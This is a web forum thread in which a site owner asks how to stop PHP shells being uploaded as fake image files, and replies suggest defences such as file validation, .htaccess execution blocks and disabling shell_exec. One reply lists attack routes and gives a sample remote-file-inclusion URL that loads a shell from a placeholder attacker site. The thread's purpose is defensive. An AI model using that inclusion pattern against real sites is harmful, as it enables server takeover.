I have an upload file and it has been hacked by php shell before. So i was wondering how i can prevent it from happending? My folder is cmod using 777 because by using other numbers, I could not make the images viewable at all. cheers, toby
Hi you should only make uploads available to trusted file extensions. you should also use some php library to ensure that the jpg and gif or any other file is a valid image and not some hidden script
u can chmod to other numbers..i dont remember the xact one..and still be able to view files.. 777 for a public folder would mean all write access to all..i think its very insecure to be..
thanks alot guys, In fact, the php that is uploaded is with extention .gif or pngh so I really have no clue how to disable the phpshell from upload. syedwasi, I've tried other number but it doesn't work. It will make the images can't be viewed. It works if the cmod is 777 . What other numbers that can be done? And what actually the group? i.e. first 7 is owner, second 7 is group, third 7 is public. So what are owner and group anywayS?
Easiest fix would be to check the uploaded file for the opening PHP tag, if it's there, delete the file.
Anti phpShell is not easy. If you use shared hosting, Zend encode important files. Dedidcated server maybe needn't encode However you must check upload shell or include shell. There lot of type use phpShell - Upload phpShell into a hosting same server and local attack - Remote File Inclusion, like: httX://yourSite/bad_code_file.php?action=_httX://attackerSite/phpShell.txt? - Upload a image file type (.JPG, GIF...) as avatar but this file content is phpShell and include it. You must know what is type attacker use to fix it. Maybe use .htaccess deny excute .phpX file to protect folder, it allow your images. Any problem or need help, contact me.
Well something else to add here if you do not want to go the .htaccess route to stop .php files from being executed. If you're running on your own server you could disable dangerous functions like shell_exec. But both these solutions is just ignoring the root of the problem which is an insecure script which is either allowing bad file extensions or allowing remote includes.